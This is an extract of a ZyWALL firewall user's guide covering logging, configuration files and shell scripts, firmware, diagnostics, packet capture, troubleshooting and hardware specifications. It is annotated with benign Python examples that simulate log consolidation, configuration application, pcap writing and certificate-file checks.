Page 840: ... notifying the Vantage CNM administrator Port Speed Use the drop down list box to select the speed of the connection between the ZyWALL s auxiliary port and the external modem Available speeds are 9600 19200 38400 57600 or 115200 bps Initial String Type the AT command string that the ZyWALL returns to the external serial modem connected to the ZyWALL s auxiliary port during connection initializati...

Page 841: ...ntage CNM Click Advanced to display more configuration fields or click Basic to display fewer fields Enable Select this check box to allow Vantage CNM to manage your ZyWALL Server IP Address FQDN Enter the IP address or fully qualified domain name of the Vantage server If the Vantage CNM server is on a different subnet to the ZyWALL and is behind a NAT router enter the WAN IP address of the NAT ro...

Page 842: ...ustom in the Device Management IP field Keepalive Interval Set how often the ZyWALL sends a keep alive packet to the Vantage CNM server if there is no other traffic The keep alive packets maintain the Vantage CNM server s control session Periodic Inform Interval Select this option to have the ZyWALL periodically send Inform messages to the Vantage CNM server HTTPS Authentication When you are using...

Page 843: ...onfiguration System Language The following table describes the labels in this screen Table 245 Configuration System Language LABEL DESCRIPTION Language Setting Select a display language for the ZyWALL s Web Configurator screens You also need to open a new browser session to display the screens in the new language Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return...

Page 845: ...re and how to send daily reports and what reports to send Use the Maintenance Log Setting screens Section 51 3 on page 847 to specify settings for recording log messages e mailing them and sending them to a remote server 51 2 Email Daily Report Use the Email Daily Report screen to start or stop data collection and view various statistics about traffic passing through your ZyWALL Note Data collecti...

Page 846: ...1000 User s Guide 846 Click Configuration Log Report Email Daily Report to display the following screen Configure this screen to have the ZyWALL e mail you system statistics every day Figure 548 Configuration Log Report Email Daily Report ...

Page 847: ...yWALL s system date and time to the subject Mail From Type the e mail address from which the outgoing e mail is delivered This address is used in replies Mail To Type the e mail address or addresses to which the outgoing e mail is delivered SMTP Authentication Select this check box if it is necessary to provide a user name and password to the SMTP server User Name This box is effective when you se...

Page 848: ...ngs tab controls which events generate alerts and where alerts are e mailed The Log Settings Summary screen provides a summary of all the settings You can use the Log Settings Edit screen to maintain the detailed settings such as log categories e mail addresses server names etc for any log Alternatively if you want to edit what events is included in each log you can also use the Active Log Summary...

Page 849: ...ivate To turn off an entry select it and click Inactivate This field is a sequential value and it is not associated with a specific log Name This field displays the type of log setting entry system log logs stored on a USB storage device connected to the ZyWALL or one of the remote servers Log Format This field displays the format of the log Internal system log you can view the log on the View Log...

Page 850: ...Figure 550 Configuration > Log & Report > Log Setting > Edit (System Log) ...

Page 851: ... day of the week the log is e mailed Time for Sending Log This field is available if the log is e mailed weekly or daily Select the time of day hours and minutes when the log is e mailed Use 24 hour notation SMTP Authentication Select this check box if it is necessary to provide a user name and password to the SMTP server User Name This box is effective when you select the SMTP Authentication chec...

Page 852: ...gory fields in the View Log tab The Default category includes debugging messages generated by open source software System log Select which events you want to log by Log Category There are three choices disable all logs red X do not log any information from this category enable normal logs green check mark create log messages and alerts from this category enable normal logs and debug logs yellow ch...

Page 853: ...hen multiple log messages were aggregated Log Consolidation Interval Type how often in seconds to consolidate log information If the same log message appears multiple times it is aggregated into one log message with the text count x where x is the number of original log messages appended at the end of the Message field OK Click this to save your changes and return to the previous screen Cancel Cli...
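The consolidation rule above (identical messages within the interval become one entry with a count appended) is worth seeing in code, because it changes what an analyst gets: the count survives but the individual timestamps of the folded events do not, and with the internal log holding only a few hundred entries (page 912) the interval is effectively a trade between buffer space and timeline detail. The script below is an added example, not ZyXEL code. The log lines are constructed, the "count=x" spelling is assumed from the guide's wording, and the function name consolidate is the example's own.

```python
"""Log consolidation as the Log Setting screen describes it: repeats of the
same message within the consolidation interval collapse into one entry with
" count=x" appended. Added example, not ZyXEL code; the log lines are
constructed and the "count=x" spelling is assumed from the guide's wording.
"""
from datetime import datetime, timedelta
from typing import List, Tuple

FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample log (timestamp, message); not a real ZyWALL log.
DROP = "Firewall rule 3 matched: DROP 10.0.0.5 -> 192.168.1.1 tcp/22"
SAMPLE_LOG = [
    ("2010-09-01 10:00:00", DROP),
    ("2010-09-01 10:00:01", DROP),
    ("2010-09-01 10:00:03", "User admin login from 192.168.1.50 (HTTPS)"),
    ("2010-09-01 10:00:09", DROP),
    ("2010-09-01 10:00:15", DROP),
]


def consolidate(entries: List[Tuple[str, str]], interval_seconds: int) -> List[Tuple[str, str]]:
    """Return consolidated (timestamp, message) tuples in time order.

    A repeat is folded into the open entry for that message when it falls
    within interval_seconds of the entry's first occurrence; otherwise the
    open entry is emitted and a new one starts. Only the first timestamp
    survives, so the individual times of the folded events are lost.
    """
    window = timedelta(seconds=interval_seconds)
    pending = {}                         # message -> [first timestamp, count]
    out: List[Tuple[str, str]] = []

    def emit(msg: str) -> None:
        first, count = pending.pop(msg)
        text = msg if count == 1 else f"{msg} count={count}"
        out.append((first.strftime(FMT), text))

    for ts_text, msg in sorted(entries):
        ts = datetime.strptime(ts_text, FMT)
        if msg in pending and ts - pending[msg][0] <= window:
            pending[msg][1] += 1
            continue
        if msg in pending:               # same message, but outside the window
            emit(msg)
        pending[msg] = [ts, 1]

    for msg in list(pending):            # flush whatever is still open
        emit(msg)
    return sorted(out)


if __name__ == "__main__":
    for ts, text in consolidate(SAMPLE_LOG, 10):
        print(ts, text)
```

With a 10-second interval the three drops at 10:00:00, 10:00:01 and 10:00:09 become one line carrying count=3, while the drop at 10:00:15 starts a fresh entry; with the interval set to 0 every event is kept. If you need per-event timing for a detection use case, send the unconsolidated stream to the remote syslog server rather than relying on the internal log.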

Page 854: ...ing The Edit Log on USB Storage Setting screen controls the detailed settings for saving logs to a connected USB storage device Go to the Log Setting Summary screen see Section 51 3 1 on page 848 and click the USB storage Edit icon Figure 551 Configuration Log Report Log Setting Edit USB Storage ...

Page 855: ...e normal logs and debug logs yellow check mark send the remote server log messages alerts and debugging information for all log categories This field is a sequential value and it is not associated with a specific entry Log Category This field displays each category of messages The Default category includes debugging messages generated by open source software Selection Select what information you w...

Page 856: ... Log Settings The Log Settings Edit screen controls the detailed settings for each log in the remote server syslog Go to the Log Settings Summary screen see Section 51 3 1 on page 848 and click a remote server Edit icon Figure 552 Configuration Log Report Log Setting Edit Remote Server ...

Page 857: ...or all of the log categories disable all logs red X do not send the remote server logs for any log category enable normal logs green check mark send the remote server log messages and alerts for all log categories enable normal logs and debug logs yellow check mark send the remote server log messages alerts and debugging information for all log categories This field is a sequential value and it is...

Page 858: ...where and how often log information is e mailed or remote server names To access this screen go to the Log Settings Summary screen see Section 51 3 1 on page 848 and click the Active Log Summary button Figure 553 Active Log Summary This screen provides a different view and a different way of indicating which messages are included in each log and each alert Please see Section 51 3 2 on page 849 whe...

Page 859: ...ion for any category to a connected USB storage device enable normal logs green check mark create log messages and alerts for all categories and save them to a connected USB storage device enable normal logs and debug logs yellow check mark create log messages alerts and debugging information for all categories and save them to a connected USB storage device E mail Server 1 Use the E Mail Server 1...

Page 860: ...y the ZyWALL does not e mail debugging information however even if this setting is selected E mail Server 1 E mail Select whether each category of events should be included in the log messages when it is e mailed green check mark and or in alerts red exclamation point for the e mail settings specified in E Mail Server 1 The ZyWALL does not e mail debugging information even if it is recorded in the...

Page 863: ...the Configuration File screen see Section 52 2 on page 866 to store and name configuration files You can also download configuration files from the ZyWALL to your computer and upload configuration files from your computer to the ZyWALL Use the Firmware Package screen see Section 52 3 on page 870 to check your current firmware version and upload firmware to the ZyWALL Use the Shell Script screen se...

Page 864: ... Configuration File / Shell Script Example (note that the script carries the administrator password in cleartext, so treat saved configuration files and scripts as sensitive):

    # enter configuration mode
    configure terminal
    # change administrator password
    username admin password 4321 user-type admin
    # configure ge3
    interface ge3
    ip address 172.23.37.240 255.255.255.0
    ip gateway 172.23.37.254 metric 1
    exit
    # create address objects for remote management to ZyWALL firewall rules
    # use the address group in case we want to open up remote manageme...

Page 865: ...onfiguration file or run a shell script the ZyWALL processes the file line by line The ZyWALL checks the first line and applies the line if no errors are detected Then it continues with the next line If the ZyWALL finds an error it stops applying the configuration file or shell script and generates a log You can change the way a configuration file or shell script is applied Include setenv stop on ...

Page 866: ... and back on the ZyWALL uses the system default conf configuration file with the ZyWALL s default settings If there is a startup config conf the ZyWALL checks it for errors and applies it If there are no errors the ZyWALL uses it and copies it to the lastgood conf configuration file as a back up file If there is an error the ZyWALL generates a log and copies the startup config conf configuration f...

Page 867: ...ance File Manager Configuration File Rename Specify the new name for the configuration file Use up to 25 characters including a zA Z0 9 _ Click OK to save the duplicate or click Cancel to close the screen without saving a duplicate of the configuration file Remove Click a configuration file s row to select it and click Remove to delete it from the ZyWALL You can only delete manually saved configur...

Page 868: ...Copy to open the Copy File screen Figure 557 Maintenance File Manager Configuration File Copy Specify a name for the duplicate configuration file Use up to 25 characters including a zA Z0 9 _ Click OK to save the duplicate or click Cancel to close the screen without saving a duplicate of the configuration file Table 253 Maintenance File Manager Configuration File continued LABEL DESCRIPTION ...

Page 869: ...this gets the ZyWALL started with a fully valid configuration file as quickly as possible Ignore errors and finish applying the configuration file this applies the valid parts of the configuration file and generates error logs for all of the configuration file s errors This lets the ZyWALL apply most of your configuration and you can refer to the logs for what to fix Ignore errors and finish apply...
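The line-by-line application described on pages 865 to 869 (and the comment, exit and write conventions on page 905) is easy to get wrong in practice: with the default stop-on-error behaviour a single bad line leaves the device half-configured and, if the write was further down the file, with nothing saved. The following simulator is an added example, not ZyXEL code, and its accepted-command table is a tiny stand-in for the real ZySH grammar. It also assumes that the directive the guide abbreviates as "setenv stop on ..." is "setenv stop-on-error on|off", and that "!" is the single-character way to leave sub-command mode; the sample script is constructed after the page 864 example with one deliberately bad line.

```python
"""How a configuration file or shell script is applied: line by line, with
'#' comment lines skipped, 'exit' or '!' leaving sub-command mode, and the
stop-on-error / ignore-errors choice from the File Manager. Added example,
not ZyXEL code. Assumptions: the accepted-command table is a tiny stand-in
for the real ZySH grammar, and "setenv stop-on-error on|off" is taken to be
the directive the guide abbreviates as "setenv stop on ...".
"""
from typing import Dict, List, Tuple

# Stand-in grammar (assumption, not the device's syntax table).
TOP_LEVEL = ("configure terminal", "username ", "address-object ")
SUB_LEVEL = ("ip address ", "ip gateway ")


def apply_config(lines: List[str], stop_on_error: bool = True) -> Dict:
    """Apply lines in order. Returns what was applied, the errors (line, text),
    the line at which application stopped (None if it ran to the end) and
    whether a 'write' was reached, since unwritten changes are lost on restart."""
    applied: List[str] = []
    errors: List[Tuple[int, str]] = []
    in_sub, written = False, False
    for lineno, raw in enumerate(lines, start=1):
        line = raw.strip()
        if not line or line.startswith("#"):          # comment lines
            continue
        if line.startswith("setenv stop-on-error"):   # policy may change mid-file
            stop_on_error = line.split()[-1] != "off"
            applied.append(line)
            continue
        if line in ("exit", "!"):                      # leave sub-command mode
            in_sub = False
            applied.append(line)
            continue
        if line.startswith("interface "):              # enter sub-command mode
            in_sub = True
            applied.append(line)
            continue
        if line == "write":
            written = True
            applied.append(line)
            continue
        accepted = SUB_LEVEL if in_sub else TOP_LEVEL
        if line.startswith(accepted):
            applied.append(line)
            continue
        errors.append((lineno, line))                  # the device logs each error
        if stop_on_error:
            return {"applied": applied, "errors": errors, "stopped_at": lineno, "written": written}
    return {"applied": applied, "errors": errors, "stopped_at": None, "written": written}


def boot(files: Dict[str, List[str]]) -> Dict:
    """Start-up selection as the guide states it: without startup-config.conf
    the system-default.conf settings are used; otherwise startup-config.conf
    is applied and, when error-free, copied to lastgood.conf."""
    if "startup-config.conf" not in files:
        return {"used": "system-default.conf", "lastgood": files.get("lastgood.conf"), "errors": []}
    result = apply_config(files["startup-config.conf"])
    if not result["errors"]:
        return {"used": "startup-config.conf", "lastgood": list(files["startup-config.conf"]), "errors": []}
    # The guide's text for the error path is cut off on this page, so only the
    # errors (each would become a log entry) are reported here.
    return {"used": "startup-config.conf", "lastgood": files.get("lastgood.conf"), "errors": result["errors"]}


# Constructed script modelled on the guide's page 864 example, with one bad
# line (an interface command issued after leaving interface mode).
SAMPLE_SCRIPT = """
# enter configuration mode
configure terminal
username admin password 4321 user-type admin
interface ge3
ip address 172.23.37.240 255.255.255.0
ip gateway 172.23.37.254 metric 1
exit
ip gateway 10.0.0.1 metric 1
write
""".splitlines()

GOOD_CONFIG = SAMPLE_SCRIPT[:8] + ["write"]

if __name__ == "__main__":
    print(apply_config(SAMPLE_SCRIPT))
    print(apply_config(SAMPLE_SCRIPT, stop_on_error=False))
    print(boot({"startup-config.conf": GOOD_CONFIG}))
```

Run against the sample, the stop-on-error pass applies six lines, stops at line 9 and never reaches the write, so the password change would vanish at the next restart; the ignore-errors pass applies everything else, logs the one bad line and does reach the write. Either way, check the error log after uploading a file rather than assuming the whole script took effect.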

Page 870: ...t recently used valid configuration file that was saved when the device last restarted If you upload and apply a configuration file with an error you can apply lastgood conf to return to a valid configuration Size This column displays the size in KB of a configuration file Last Modified This column displays the date and time that the individual configuration files were last changed or saved Upload...

Page 871: ...not be decompressed option while you download the firmware package See Section 33 2 1 on page 559 for more on the anti virus Destroy compressed files that could not be decompressed option The firmware update can take up to five minutes Do not turn off or reset the ZyWALL while the firmware update is in progress Figure 559 Maintenance File Manager Firmware Package The following table describes the ...

Page 872: ... After five minutes log in again and check your new firmware version in the HOME screen If the upload was not successful the following message appears in the status bar at the bottom of the screen Figure 562 Firmware Upload Error 52 4 The Shell Script Screen Use shell script files to have the ZyWALL use commands that you specify Use a text editor to create the shell script files They must use a zy...

Page 873: ...k a shell script s row to select it and click Rename to open the Rename File screen Figure 564 Maintenance File Manager Shell Script Rename Specify the new name for the shell script file Use up to 25 characters including a zA Z0 9 _ Click OK to save the duplicate or click Cancel to close the screen without saving a duplicate of the configuration file Remove Click a shell script file s row to selec...

Page 874: ...ed to wait awhile for the ZyWALL to finish applying the commands This column displays the number for each shell script file entry File Name This column displays the label that identifies a shell script file Size This column displays the size in KB of a shell script file Last Modified This column displays the date and time that the individual shell script files were last changed or saved Upload She...

Page 875: ...through the ZyWALL Use the Maintenance Diagnostics Core Dump screens see Section 53 4 on page 882 to have the ZyWALL save a process s core dump to an attached USB storage device if the process terminates abnormally crashes so you can send the file to customer support for troubleshooting Use the Maintenance Diagnostics System Log screens see Section 53 5 on page 883 to download files of system logs...

Page 876: ...ubleshooting Figure 567 Maintenance Diagnostics Files Table 256 Maintenance Diagnostics LABEL DESCRIPTION Filename This is the name of the most recently created diagnostic file Last modified This is the date and time that the last diagnostic file was created The format is yyyy mm dd hh mm ss Size This is the size of the most recently created diagnostic file Copy the diagnostic file to USB storage ...

Page 877: ...N Remove Select files and click Remove to delete them from the ZyWALL Use the Shift and or Ctrl key to select multiple files A pop up window asks you to confirm that you want to delete Download Click a file to select it and click Download to save it to your computer This column displays the number for each file entry The total number of files that you can save depends on the file sizes and the ava...

Page 878: ...rrow button to move them to the Capture Interfaces list Use the Shift and or Ctrl key to select multiple objects IP Type Select the protocol of traffic for which to capture packets Select any to capture packets for all types of traffic Host IP Select a host IP address object for which to capture packets Select any to capture packets for all hosts Select User Defined to be able to enter an IP addre...

Page 879: ...0 The ZyWALL stops the capture and generates the capture file when either the file reaches this size or the time period specified in the Duration field expires Split threshold Specify a maximum size limit in megabytes for individual packet capture files After a packet capture file reaches this size the ZyWALL starts another packet capture file Duration Set a time limit in seconds for the capture T...

Page 880: ...ALL s throughput or performance may be affected while a packet capture is in progress After the ZyWALL finishes the capture it saves a separate capture file for each selected interface The total number of packet capture files that you can save depends on the file sizes and the available flash storage space Once the flash storage space is full adding more packet captures will fail Stop Click this b...

Page 881: ...as set to 1500 bytes Figure 570 Packet Capture File Example This column displays the number for each packet capture file entry The total number of packet capture files that you can save depends on the file sizes and the available flash storage space File Name This column displays the label that identifies the file The file name format is interface name file suffix cap Size This column displays the...
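Pages 879 to 881 describe the knobs that bound a capture on the firewall: a per-file size limit, a split threshold that starts a new file, a duration, and the number of bytes kept per packet (1500 in the example file). The writer below is an added example, not ZyWALL code, showing what those limits do to the resulting pcap files: packets are truncated to the snap length (the record keeps the original length so the loss is visible) and the output rotates to a new file when the next record would push the current one past the threshold. The threshold here is in bytes rather than the screen's megabytes, the packets are constructed dummies, and the function names are the example's own.

```python
"""Write packet captures in pcap format, truncating each packet to the
snap length and rotating to a new file when a split threshold is reached.
Added example, not ZyWALL code; packets are constructed dummies and the
threshold is in bytes (the device's screen uses megabytes).
"""
import struct
from typing import Iterable, List, Optional, Tuple

PCAP_MAGIC = 0xA1B2C3D4           # little-endian pcap, microsecond timestamps
LINKTYPE_ETHERNET = 1

Packet = Tuple[int, int, bytes]   # (ts_sec, ts_usec, frame)


def pcap_header(snaplen: int) -> bytes:
    # magic, version major/minor, thiszone, sigfigs, snaplen, linktype
    return struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, snaplen, LINKTYPE_ETHERNET)


def pcap_record(ts_sec: int, ts_usec: int, frame: bytes, snaplen: int) -> bytes:
    captured = frame[:snaplen]    # keep at most snaplen bytes; orig_len records the truth
    return struct.pack("<IIII", ts_sec, ts_usec, len(captured), len(frame)) + captured


def write_captures(packets: Iterable[Packet], snaplen: int = 1500,
                   split_threshold: Optional[int] = None) -> List[bytes]:
    """Return one bytes blob per output file. A new file starts when adding the
    next record would take the current file past split_threshold bytes."""
    files: List[bytes] = []
    current, n_in_current = pcap_header(snaplen), 0
    for ts_sec, ts_usec, frame in packets:
        rec = pcap_record(ts_sec, ts_usec, frame, snaplen)
        if split_threshold and n_in_current and len(current) + len(rec) > split_threshold:
            files.append(current)
            current, n_in_current = pcap_header(snaplen), 0
        current += rec
        n_in_current += 1
    if n_in_current:
        files.append(current)
    return files


def read_pcap(blob: bytes) -> List[Tuple[int, int, int, bytes]]:
    """Parse a pcap blob back into (ts_sec, ts_usec, orig_len, data) records."""
    magic, _, _, _, _, snaplen, _ = struct.unpack("<IHHiIII", blob[:24])
    if magic != PCAP_MAGIC:
        raise ValueError("not a little-endian pcap file")
    pos, out = 24, []
    while pos < len(blob):
        ts_sec, ts_usec, incl, orig = struct.unpack("<IIII", blob[pos:pos + 16])
        pos += 16
        if incl > snaplen or pos + incl > len(blob):
            raise ValueError("corrupt record")
        out.append((ts_sec, ts_usec, orig, blob[pos:pos + incl]))
        pos += incl
    return out


# Constructed sample: five 100-byte frames one second apart, then one
# 2000-byte frame that exceeds the 1500-byte snap length.
SAMPLE_PACKETS: List[Packet] = [(1283335200 + i, 0, bytes([i]) * 100) for i in range(5)]
SAMPLE_PACKETS.append((1283335205, 0, b"\xaa" * 2000))

if __name__ == "__main__":
    for n, blob in enumerate(write_captures(SAMPLE_PACKETS, split_threshold=256)):
        print(f"file {n}: {len(blob)} bytes, {len(read_pcap(blob))} packets")
```

The practical reading: a 1500-byte snap length silently drops the tail of jumbo or reassembled frames, so a truncated payload in the capture is not proof the packet was short, and every split boundary is a point where a flow is cut across two files that must be merged before analysis.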

Page 882: ...e following table describes the labels in this screen 53 4 1 Core Dump Files Screen Click Maintenance Diagnostics Core Dump Files to open the core dump files screen This screen lists the core dump files stored on the ZyWALL or a Table 260 Maintenance Diagnostics Core Dump LABEL DESCRIPTION Save core dump to USB storage if ready Select this to have the ZyWALL save a process s core dump to an attach...

Page 883: ...les LABEL DESCRIPTION Remove Select files and click Remove to delete them from the ZyWALL Use the Shift and or Ctrl key to select multiple files A pop up window asks you to confirm that you want to delete Download Click a file to select it and click Download to save it to your computer This column displays the number for each packet capture file entry The total number of packet capture files that ...

Page 884: ...ck Remove to delete them from the ZyWALL Use the Shift and or Ctrl key to select multiple files A pop up window asks you to confirm that you want to delete Download Click a file to select it and click Download to save it to your computer This column displays the number for each file entry The total number of files that you can save depends on the file sizes and the available storage space File Nam...

Page 885: ...command to save the configuration before you reboot. Otherwise the changes are lost when you reboot. Reboot is different from reset (see Section 56.1 on page 906): reset returns the device to its default configuration. 54.2 The Reboot Screen: The Reboot screen is part of the Web Configurator so that remote users can restart the device. To access this screen click Maintenance > Reboot. Figure 574 Maintenance > Re...

Page 887: ...ZyWALL or remove the power Not doing so can cause the firmware to become corrupt 55 1 1 What You Need To Know Shutdown writes all cached data to the local storage and stops the system processes 55 2 The Shutdown Screen To access this screen click Maintenance Shutdown Figure 575 Maintenance Shutdown Click the Shutdown button to shut down the ZyWALL Wait for the device to shut down before you manual...

Page 889: ...ontact your local vendor Cannot access the ZyWALL from the LAN Check the cable connection between the ZyWALL and your computer or switch Ping the ZyWALL from a LAN computer Make sure your computer s Ethernet card is installed and functioning properly Also make sure that its IP address is in the same subnet as the ZyWALL s In the computer click Start All Programs Accessories and then Command Prompt...

Page 890: ... more noticeable with a large browser window You can try shrinking the browser window if this is an issue I cannot access the Internet Check the ZyWALL s connection to the Ethernet jack with Internet access Make sure the Internet gateway device such as a DSL modem is working properly Check the WAN interface s status in the Dashboard Use the installation setup wizard again and make sure that you en...

Page 891: ...em for certain interfaces Many security settings are usually applied to zones Make sure you assign the interfaces to the appropriate zones When you create an interface there is no security applied on it until you assign it to a zone The ZyWALL is not applying the custom policy route I configured The ZyWALL checks the policy routes in the order that they are listed So make sure that your custom pol...

Page 892: ...face You cannot set up a PPP interface virtual Ethernet interface or virtual VLAN interface if the underlying interface is a member of a bridge You also cannot add an Ethernet interface or VLAN interface to a bridge if the member interface has a virtual interface or PPP interface on top of it My rules and settings that apply to a particular interface no longer work The interface s IP address may h...

Page 893: ...igure a particular VLAN interface on top of an Ethernet interface even though I have it configured on top of another Ethernet interface: Each VLAN interface is created on top of only one Ethernet interface. I cannot get the auxiliary port to connect to my phone line: You have to connect an external modem to the ZyWALL's auxiliary port to use the auxiliary interface. The ZyWALL is not applying an in...

Page 894: ... was matched still goes through Since the ZyWALL erases the infected portion of the file before sending it you may not be able to open the file The ZyWALL is not scanning some zipped files The ZyWALL cannot unzip password protected ZIP files or a ZIP file within another ZIP file There are also limits to the number of ZIP files that the ZyWALL can concurrently unzip The ZyWALL is deleting some zipp...

Page 895: ...named custom rules then all custom signatures on the ZyWALL are overwritten with the new file If this is not your intention make sure that the files you import are not named custom rules I cannot configure some items in IDP that I can configure in Snort Not all Snort functionality is supported in the ZyWALL The ZyWALL s performance seems slower after configuring ADP Depending on your network topol...

Page 896: ...ALL You may need to configure the DDNS entry s IP Address setting to Auto if the interface has a dynamic IP address or there are one or more NAT routers between the ZyWALL and the DDNS server The ZyWALL may not determine the proper IP address if there is an HTTP proxy server between the ZyWALL and the DDNS server I cannot create a second HTTP redirect rule for an incoming interface You can configu...

Page 897: ...IPSec tunnel does not build properly the problem is likely a configuration error at one of the IPSec routers Log into both ZyXEL IPSec routers and check the settings in each field methodically and slowly Make sure both the ZyWALL and remote IPSec router have the same security settings for the VPN tunnel It may help to display the settings for both routers side by side Here are some general suggest...

Page 898: ...IP protocol 50 The ZyWALL supports UDP port 500 and UDP port 4500 for NAT traversal If you enable this make sure the To ZyWALL firewall rules allow UDP port 4500 too Make sure regular firewall rules allow traffic between the VPN tunnel and the rest of the network Regular firewall rules check packets the ZyWALL sends before the ZyWALL encrypts them and check packets the ZyWALL receives after the Zy...

Page 899: ...ons using the new settings I cannot get my VPN concentrator configuration to work Turn off policy enforcement in the member VPN connections Make sure your firewall rules are not blocking the VPN packets If the USG ZyWALLs VPN tunnels are members of a single zone make sure it is not set to block intra zone traffic The VPN connection is up but VPN traffic cannot be transmitted through the VPN tunnel...

Page 900: ...rver No warning message is displayed I cannot download the ZyWALL s firmware package The ZyWALL s firmware package cannot go through the ZyWALL when you enable the anti virus Destroy compressed files that could not be decompressed option The ZyWALL classifies the firmware package as not being able to be decompressed and deletes it You can upload the firmware package to the ZyWALL with the option e...

Page 901: ...policy for the application The ZyWALL examines these first eight packets to identify the application I configured policy routes to manage the bandwidth of TCP and UDP traffic but the bandwidth management is not being applied properly It is recommended to use application patrol instead of policy routes to manage the bandwidth of TCP and UDP traffic Device HA is not working You may need to disable S...

Page 902: ...y reactivate the bridge interfaces. I cannot get the RADIUS server to authenticate the ZyWALL's default admin account: The default admin account is always authenticated locally, regardless of the authentication method setting. See Chapter 44 on page 733 for more information about authentication methods. The ZyWALL fails to authenticate the ext-user accounts I configured: An external server such a...

Page 903: ...up ZyWALLs to the same services The schedule I configured is not being applied at the configured times Make sure the ZyWALL s current date and time are correct I cannot get a certificate to import into the ZyWALL 1 For My Certificates you can import a certificate that matches a corresponding certification request that was generated by the ZyWALL You can also import a certificate in PKCS 12 format ...

Page 904: ...ate passwords Exporting a PKCS 12 file creates this and you must provide it to decrypt the contents when you import the file into the ZyWALL Note Be careful not to convert a binary file to text during the transfer process It is easy for this to occur since many programs use text files by default My file sharing SSL application object does not work Make sure you configure the shared folder on the f...
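The note above about binary files being converted to text in transit is the usual reason a PKCS#12 or DER import fails with an unhelpful error: an FTP client or mail gateway in text mode rewrites every 0x0a byte as 0x0d 0x0a, so the file's outer ASN.1 length no longer matches its size. The checker below is an added example, not from the guide: it tells PEM text apart from a DER container, verifies that the declared ASN.1 length matches the file, and recognises (and can undo) the CRLF mangling. It does not open the PKCS#12 itself, which needs the export password and a crypto library; the sample blobs are constructed and the function names are the example's own.

```python
"""Check whether a certificate file to be imported is PEM text, an intact
DER/PKCS#12 binary, or a binary whose ASN.1 length no longer matches its
size (the signature of a binary file converted to text in transit).
Added example, not from the guide; sample blobs are constructed.
"""
from typing import Optional, Tuple


def ber_length(data: bytes, pos: int) -> Tuple[int, int]:
    """Decode a BER length at pos; return (length, header bytes consumed)."""
    first = data[pos]
    if first < 0x80:
        return first, 1
    n = first & 0x7F
    if n == 0 or pos + 1 + n > len(data):
        raise ValueError("unsupported or truncated length")
    return int.from_bytes(data[pos + 1:pos + 1 + n], "big"), 1 + n


def declared_size(data: bytes) -> Optional[int]:
    """Total size the outer SEQUENCE claims, or None if data is not a SEQUENCE."""
    if len(data) < 2 or data[0] != 0x30:
        return None
    try:
        length, hdr = ber_length(data, 1)
    except ValueError:
        return None
    return 1 + hdr + length


def repair_crlf(data: bytes) -> Optional[bytes]:
    """Undo a text-mode transfer (CRLF for LF) if that makes the size match.
    Heuristic: a DER file that legitimately contained 0x0d 0x0a would be
    altered, so re-exporting the file is the real fix."""
    if b"\r\n" not in data:
        return None
    fixed = data.replace(b"\r\n", b"\n")
    return fixed if declared_size(fixed) == len(fixed) else None


def classify_cert_file(data: bytes) -> str:
    if data.lstrip().startswith(b"-----BEGIN "):
        return "pem"
    size = declared_size(data)
    if size is None:
        return "unknown"
    if size == len(data):
        return "der"
    if repair_crlf(data) is not None:
        return "der-crlf-mangled"
    return "der-length-mismatch"


# Constructed samples (not real certificates): a SEQUENCE holding an OCTET
# STRING whose content includes a 0x0a byte, a long-form-length SEQUENCE, and
# a PEM-armoured placeholder.
SAMPLE_DER = b"\x30\x05" + b"\x04\x03\x0a\x0b\x0c"
SAMPLE_DER_LONG = b"\x30\x82\x01\x00" + b"\x00" * 256
SAMPLE_PEM = b"-----BEGIN CERTIFICATE-----\nMIIB...\n-----END CERTIFICATE-----\n"

if __name__ == "__main__":
    mangled = SAMPLE_DER.replace(b"\n", b"\r\n")
    print(classify_cert_file(SAMPLE_DER), classify_cert_file(mangled),
          repair_crlf(mangled) == SAMPLE_DER)
```

A result of der-crlf-mangled means the transfer, not the certificate, is the problem; a plain der-length-mismatch usually means the file was truncated or is not what its extension says.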

Page 905: ...as a comment Your configuration files or shell scripts can use exit or a command line consisting of a single to have the ZyWALL exit sub command mode Include write commands in your scripts Otherwise the changes will be lost when the ZyWALL restarts You could use multiple write commands in a long script Note exit or must follow sub commands if it is to make the ZyWALL exit sub command mode See Chap...

Page 906: ...ny method, try restarting it by turning the power off and then on again. If you still cannot access the ZyWALL by any method, or you forget the administrator password(s), you can reset the ZyWALL to its factory default settings. Any configuration files or shell scripts that you saved on the ZyWALL should still be available afterwards. Because the reset bypasses the administrator password and leaves the saved configuration files (which can contain credentials) on the device, anyone with physical access to the ZyWALL effectively has administrative access; restrict that access accordingly. Use the following procedure to reset the ZyWALL to its factory default...

Page 907: 56.2 Getting More Troubleshooting Help: Search for support information for your model at www.zyxel.com for more troubleshooting suggestions.

Page 909: ...ons (FEATURE / SPECIFICATION):
Number of MAC addresses: 5
Ethernet Interfaces: 5 Ethernet interfaces; all are Gigabit Ethernet, full duplex, RJ-45 connectors, auto-negotiation, auto MDI/MDIX (auto crossover)
Management interface: RS-232, DB9F connector
AUX port: RS-232, DB9M connector
USB Slots: 2 (USB 2.0, plug and play)
Compatible USB Cards: 3G: Huawei E220, E270, E160, E169, E800 and E180
HDD Slo...

Page 910: (three values per row are the table's three model columns; the column headings are on the part of the page not reproduced here)
...: 5 / 5 / 5
Flash Size: 256 / 256 / 256
DRAM Size: 1024 / 1024 / 1024
INTERFACE
VLAN: 32 / 32 / 128
Virtual (alias): 4 per interface / 4 per interface / 4 per interface
PPP (system default): NA / NA / 5
PPP (user created): 12 / 12 / 12
Bridge: 12 / 12 / 12
ROUTING
Static Routes: 256 / 256 / 256
Policy Routes: 5,000 / 5,000 / 5,000
Sessions: 200,000 / 512,000 / 512,000
ARP Table Size: 1024 / 1024 / 1024
MAC Table Size (Bridge Mode only): 8K / 8K / 8K
NAT
NAT Entries...

Page 911: ...000
Maximum address object in one group: 128 / 128 / 128
Service Objects: 5000 / 5000 / 5000
Service Groups: 1000 / 1000 / 1000
Maximum service object in one group: 128 / 128 / 128
Schedule Objects: 512 / 512 / 512
ISP Accounts: 128 / 128 / 128
Maximum Number of LDAP Groups: 16 / 16 / 16
Maximum Number of LDAP Servers for Each LDAP Group: 4 / 4 / 4
Maximum Number of RADIUS Groups: 16 / 16 / 16
Maximum Number of RADIUS Servers for Each RADIUS...

Page 912: ...Pool: 2048 / 2048 / 2048
Maximum Number of DDNS Profiles: 10 / 10 / 10
DHCP Relay: 2 per interface / 2 per interface / 2 per interface
CENTRALIZED LOG
Log Entries: 512 / 512 / 512
Debug Log Entries: 1024 / 1024 / 1024
